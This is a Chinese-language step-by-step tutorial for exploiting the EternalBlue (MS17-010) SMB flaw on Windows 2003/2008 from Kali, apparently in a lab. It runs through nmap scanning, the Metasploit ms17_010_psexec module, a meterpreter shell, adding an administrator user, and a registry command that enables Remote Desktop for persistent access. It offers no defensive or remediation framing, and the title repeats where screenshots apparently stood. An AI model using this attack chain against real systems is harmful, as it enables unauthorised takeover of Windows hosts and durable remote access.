永恒之蓝漏洞攻击完整步骤

需要设备:

kali攻击机

windows2003/windows2008被攻击机 ip:192.168.15.129

1.进行端口扫描

nmap -Pn -sV -T4 ip地址

永恒之蓝漏洞攻击完整步骤

明白445端口和3389端口open,3389关闭现在无所谓,如果开启以后拿到权限以后就不用做开启3389端口的操作

2.漏洞脚本检测

nmap --script=vuln 192.168.15.129(ip地址)

永恒之蓝漏洞攻击完整步骤

永恒之蓝漏洞攻击完整步骤

看出ms17-010漏洞可以攻击

3.msfconsole测试

msfconsole

永恒之蓝漏洞攻击完整步骤

4.查找合适的测试漏洞的模块

search ms17-010

永恒之蓝漏洞攻击完整步骤

5.使用模块进行测试

Use 模块

use exploit/windows/smb/ms17_010_psexec

永恒之蓝漏洞攻击完整步骤

6.查看攻击模块

永恒之蓝漏洞攻击完整步骤

7.添加被攻击机ip

永恒之蓝漏洞攻击完整步骤

8.开始进行测试

永恒之蓝漏洞攻击完整步骤

这样这是攻击成功.

9.查看拿到的权限

meterpreter > ls

10.进入shell,就可以在被攻击机里进行一系列操作

永恒之蓝漏洞攻击完整步骤

写入文件,查看能否写入

echo “hi” > C:/1.txt

永恒之蓝漏洞攻击完整步骤

11.添加用户并把用户加入到管理员组(提权)

永恒之蓝漏洞攻击完整步骤

备注:如果3389端口开的情况,进行下一步,如果3389端口关闭,进行此命令开启3389端口

开启3389 REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

关闭3389 REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f

12.开启完3389端口以后,就可以进行远程桌面连接

主机进行远程连接

Win+R:mstsc

永恒之蓝漏洞攻击完整步骤

输入服务器ip,用户名(刚才创建的用户名)

永恒之蓝漏洞攻击完整步骤

永恒之蓝漏洞攻击完整步骤

完整的步骤就完成了,成功拿到了所有的权限